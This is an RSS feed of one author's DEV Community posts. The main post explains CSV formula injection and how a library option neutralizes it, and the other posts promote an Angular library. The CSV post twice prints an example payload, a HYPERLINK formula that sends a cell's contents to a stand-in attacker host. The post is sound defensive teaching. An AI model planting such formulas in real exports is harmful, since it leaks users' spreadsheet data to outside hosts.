<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: Myroslav Martsin</title>
    <description>The latest articles on DEV Community by Myroslav Martsin (@myroslavmartsin).</description>
    <link>https://dev.to/myroslavmartsin</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F2492950%2Fc058fa5d-3387-4fe8-91fc-d980cbd048e2.jpg</url>
      <title>DEV Community: Myroslav Martsin</title>
      <link>https://dev.to/myroslavmartsin</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/myroslavmartsin"/>
    <language>en</language>
    <item>
      <title>[Boost]</title>
      <dc:creator>Myroslav Martsin</dc:creator>
      <pubDate>Thu, 18 Jun 2026 16:31:54 +0000</pubDate>
      <link>https://dev.to/myroslavmartsin/-16p4</link>
      <guid>https://dev.to/myroslavmartsin/-16p4</guid>
      <description>&lt;div class="ltag__link--embedded"&gt;
  &lt;div class="crayons-story "&gt;
  &lt;a href="https://dev.to/myroslavmartsin/the-csv-export-vulnerability-you-probably-have-and-a-one-line-fix-2cmk" class="crayons-story__hidden-navigation-link"&gt;The CSV export vulnerability you probably have (and a one-line fix)&lt;/a&gt;


  &lt;div class="crayons-story__body crayons-story__body-full_post"&gt;
    &lt;div class="crayons-story__top"&gt;
      &lt;div class="crayons-story__meta"&gt;
        &lt;div class="crayons-story__author-pic"&gt;

          &lt;a href="/myroslavmartsin" class="crayons-avatar  crayons-avatar--l  "&gt;
            &lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F2492950%2Fc058fa5d-3387-4fe8-91fc-d980cbd048e2.jpg" alt="myroslavmartsin profile" class="crayons-avatar__image"&gt;
          &lt;/a&gt;
        &lt;/div&gt;
        &lt;div&gt;
          &lt;div&gt;
            &lt;a href="/myroslavmartsin" class="crayons-story__secondary fw-medium m:hidden"&gt;
              Myroslav Martsin
            &lt;/a&gt;
            &lt;div class="profile-preview-card relative mb-4 s:mb-0 fw-medium hidden m:inline-block"&gt;
              
                Myroslav Martsin
                
              
              &lt;div id="story-author-preview-content-3934160" class="profile-preview-card__content crayons-dropdown branded-7 p-4 pt-0"&gt;
                &lt;div class="gap-4 grid"&gt;
                  &lt;div class="-mt-4"&gt;
                    &lt;a href="/myroslavmartsin" class="flex"&gt;
                      &lt;span class="crayons-avatar crayons-avatar--xl mr-2 shrink-0"&gt;
                        &lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F2492950%2Fc058fa5d-3387-4fe8-91fc-d980cbd048e2.jpg" class="crayons-avatar__image" alt=""&gt;
                      &lt;/span&gt;
                      &lt;span class="crayons-link crayons-subtitle-2 mt-5"&gt;Myroslav Martsin&lt;/span&gt;
                    &lt;/a&gt;
                  &lt;/div&gt;
                  &lt;div class="print-hidden"&gt;
                    
                      Follow
                    
                  &lt;/div&gt;
                  &lt;div class="author-preview-metadata-container"&gt;&lt;/div&gt;
                &lt;/div&gt;
              &lt;/div&gt;
            &lt;/div&gt;

          &lt;/div&gt;
          &lt;a href="https://dev.to/myroslavmartsin/the-csv-export-vulnerability-you-probably-have-and-a-one-line-fix-2cmk" class="crayons-story__tertiary fs-xs"&gt;&lt;time&gt;Jun 18&lt;/time&gt;&lt;span class="time-ago-indicator-initial-placeholder"&gt;&lt;/span&gt;&lt;/a&gt;
        &lt;/div&gt;
      &lt;/div&gt;

    &lt;/div&gt;

    &lt;div class="crayons-story__indention"&gt;
      &lt;h2 class="crayons-story__title crayons-story__title-full_post"&gt;
        &lt;a href="https://dev.to/myroslavmartsin/the-csv-export-vulnerability-you-probably-have-and-a-one-line-fix-2cmk" id="article-link-3934160"&gt;
          The CSV export vulnerability you probably have (and a one-line fix)
        &lt;/a&gt;
      &lt;/h2&gt;
        &lt;div class="crayons-story__tags"&gt;
            &lt;a class="crayons-tag  crayons-tag--monochrome " href="/t/security"&gt;&lt;span class="crayons-tag__prefix"&gt;#&lt;/span&gt;security&lt;/a&gt;
            &lt;a class="crayons-tag  crayons-tag--monochrome " href="/t/typescript"&gt;&lt;span class="crayons-tag__prefix"&gt;#&lt;/span&gt;typescript&lt;/a&gt;
            &lt;a class="crayons-tag  crayons-tag--monochrome " href="/t/javascript"&gt;&lt;span class="crayons-tag__prefix"&gt;#&lt;/span&gt;javascript&lt;/a&gt;
            &lt;a class="crayons-tag  crayons-tag--monochrome " href="/t/webdev"&gt;&lt;span class="crayons-tag__prefix"&gt;#&lt;/span&gt;webdev&lt;/a&gt;
        &lt;/div&gt;
      &lt;div class="crayons-story__bottom"&gt;
        &lt;div class="crayons-story__details"&gt;
          &lt;a href="https://dev.to/myroslavmartsin/the-csv-export-vulnerability-you-probably-have-and-a-one-line-fix-2cmk" class="crayons-btn crayons-btn--s crayons-btn--ghost crayons-btn--icon-left"&gt;
            &lt;div class="multiple_reactions_aggregate"&gt;
              &lt;span class="multiple_reactions_icons_container"&gt;
                  &lt;span class="crayons_icon_container"&gt;
                    &lt;img src="https://assets.dev.to/assets/fire-f60e7a582391810302117f987b22a8ef04a2fe0df7e3258a5f49332df1cec71e.svg" width="18" height="18"&gt;
                  &lt;/span&gt;
                  &lt;span class="crayons_icon_container"&gt;
                    &lt;img src="https://assets.dev.to/assets/multi-unicorn-b44d6f8c23cdd00964192bedc38af3e82463978aa611b4365bd33a0f1f4f3e97.svg" width="18" height="18"&gt;
                  &lt;/span&gt;
                  &lt;span class="crayons_icon_container"&gt;
                    &lt;img src="https://assets.dev.to/assets/sparkle-heart-5f9bee3767e18deb1bb725290cb151c25234768a0e9a2bd39370c382d02920cf.svg" width="18" height="18"&gt;
                  &lt;/span&gt;
              &lt;/span&gt;
              &lt;span class="aggregate_reactions_counter"&gt;10&lt;span class="hidden s:inline"&gt;&amp;nbsp;reactions&lt;/span&gt;&lt;/span&gt;
            &lt;/div&gt;
          &lt;/a&gt;
            &lt;a href="https://dev.to/myroslavmartsin/the-csv-export-vulnerability-you-probably-have-and-a-one-line-fix-2cmk#comments" class="crayons-btn crayons-btn--s crayons-btn--ghost crayons-btn--icon-left flex items-center"&gt;
              

              7&lt;span class="hidden s:inline"&gt;&amp;nbsp;comments&lt;/span&gt;
            &lt;/a&gt;
        &lt;/div&gt;
        &lt;div class="crayons-story__save"&gt;
          &lt;small class="crayons-story__tertiary fs-xs mr-2"&gt;
            1 min read
          &lt;/small&gt;
            
              &lt;span class="bm-initial crayons-icon c-btn__icon"&gt;
                

              &lt;/span&gt;
              &lt;span class="bm-success crayons-icon c-btn__icon"&gt;
                

              &lt;/span&gt;
            
        &lt;/div&gt;
      &lt;/div&gt;
    &lt;/div&gt;
  &lt;/div&gt;
&lt;/div&gt;

&lt;/div&gt;


</description>
    </item>
    <item>
      <title>The CSV export vulnerability you probably have (and a one-line fix)</title>
      <dc:creator>Myroslav Martsin</dc:creator>
      <pubDate>Thu, 18 Jun 2026 16:30:51 +0000</pubDate>
      <link>https://dev.to/myroslavmartsin/the-csv-export-vulnerability-you-probably-have-and-a-one-line-fix-2cmk</link>
      <guid>https://dev.to/myroslavmartsin/the-csv-export-vulnerability-you-probably-have-and-a-one-line-fix-2cmk</guid>
      <description>&lt;p&gt;You let users export data to CSV. They open it in a spreadsheet. A cell runs a formula. That is CSV injection, and most export endpoints have it.&lt;/p&gt;

&lt;p&gt;Any cell starting with &lt;code&gt;=&lt;/code&gt;, &lt;code&gt;+&lt;/code&gt;, &lt;code&gt;-&lt;/code&gt;, &lt;code&gt;@&lt;/code&gt;, a tab, or a carriage return is treated as a formula. An attacker-controlled name like &lt;code&gt;=HYPERLINK("http://evil.com?x="&amp;amp;A1)&lt;/code&gt; then runs on open and leaks a neighboring cell. The CSV is perfectly valid, so escaping commas does nothing here.&lt;/p&gt;

&lt;p&gt;The fix is to prefix formula-leading cells. &lt;a href="https://github.com/martsinlabs/csv-pipe" rel="noopener noreferrer"&gt;csv-pipe&lt;/a&gt; has it built in:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight typescript"&gt;&lt;code&gt;&lt;span class="k"&gt;import&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="nx"&gt;stringify&lt;/span&gt; &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="k"&gt;from&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;csv-pipe&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

&lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;rows&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;[{&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;=HYPERLINK("http://evil.com?x="&amp;amp;A1)&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="na"&gt;note&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;attacker&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt; &lt;span class="p"&gt;}];&lt;/span&gt;

&lt;span class="nf"&gt;stringify&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;rows&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="na"&gt;sanitizeFormulas&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt; &lt;span class="p"&gt;});&lt;/span&gt;
&lt;span class="c1"&gt;// name,note&lt;/span&gt;
&lt;span class="c1"&gt;// "'=HYPERLINK(""http://evil.com?x=""&amp;amp;A1)",attacker&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The leading &lt;code&gt;'&lt;/code&gt; makes the spreadsheet show the cell as text instead of running it (the doubled quotes are normal CSV escaping). It only touches string and array cells; numbers and dates are left alone.&lt;br&gt;
Turn it on for any export of untrusted data.&lt;/p&gt;

&lt;p&gt;csv-pipe is a small, zero-dependency CSV library that encodes and parses, both directions typed and streaming, with this guard built in.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://github.com/martsinlabs/csv-pipe" rel="noopener noreferrer"&gt;GitHub&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://martsinlabs.github.io/csv-pipe/" rel="noopener noreferrer"&gt;Docs&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.npmjs.com/package/csv-pipe" rel="noopener noreferrer"&gt;npm&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>security</category>
      <category>typescript</category>
      <category>javascript</category>
      <category>webdev</category>
    </item>
    <item>
      <title>[Boost]</title>
      <dc:creator>Myroslav Martsin</dc:creator>
      <pubDate>Mon, 17 Nov 2025 19:50:13 +0000</pubDate>
      <link>https://dev.to/myroslavmartsin/-5c4o</link>
      <guid>https://dev.to/myroslavmartsin/-5c4o</guid>
      <description>&lt;div class="ltag__link"&gt;
  &lt;a href="/myroslavmartsin" class="ltag__link__link"&gt;
    &lt;div class="ltag__link__pic"&gt;
      &lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F2492950%2Fc058fa5d-3387-4fe8-91fc-d980cbd048e2.jpg" alt="myroslavmartsin"&gt;
    &lt;/div&gt;
  &lt;/a&gt;
  &lt;a href="https://dev.to/myroslavmartsin/with-css-media-queries-hidden-doesnt-mean-inactive-3fig" class="ltag__link__link"&gt;
    &lt;div class="ltag__link__content"&gt;
      &lt;h2&gt;With CSS media queries, hidden doesn’t mean inactive.&lt;/h2&gt;
      &lt;h3&gt;Myroslav Martsin ・ Nov 14&lt;/h3&gt;
      &lt;div class="ltag__link__taglist"&gt;
        &lt;span class="ltag__link__tag"&gt;#angular&lt;/span&gt;
      &lt;/div&gt;
    &lt;/div&gt;
  &lt;/a&gt;
&lt;/div&gt;


</description>
      <category>angular</category>
    </item>
    <item>
      <title>With CSS media queries, hidden doesn’t mean inactive.</title>
      <dc:creator>Myroslav Martsin</dc:creator>
      <pubDate>Fri, 14 Nov 2025 21:41:07 +0000</pubDate>
      <link>https://dev.to/myroslavmartsin/with-css-media-queries-hidden-doesnt-mean-inactive-3fig</link>
      <guid>https://dev.to/myroslavmartsin/with-css-media-queries-hidden-doesnt-mean-inactive-3fig</guid>
      <description>&lt;p&gt;The component still renders, runs lifecycles, and keeps subscriptions alive. &lt;br&gt;
All that background logic quietly eats memory and slows your app down. &lt;/p&gt;

&lt;p&gt;NGX-MQ solves the problem. &lt;br&gt;
Signal-based media queries that prevent rendering before it starts — nothing runs unless it truly matters. &lt;/p&gt;

&lt;p&gt;Give it a try — your app will thank you! 🚀 &lt;/p&gt;

&lt;p&gt;npm: &lt;a href="https://www.npmjs.com/package/ngx-mq" rel="noopener noreferrer"&gt;https://www.npmjs.com/package/ngx-mq&lt;/a&gt;&lt;br&gt;
GitHub: &lt;a href="https://github.com/martsinlabs/ngx-mq" rel="noopener noreferrer"&gt;https://github.com/martsinlabs/ngx-mq&lt;/a&gt;&lt;/p&gt;

</description>
      <category>angular</category>
    </item>
  </channel>
</rss>
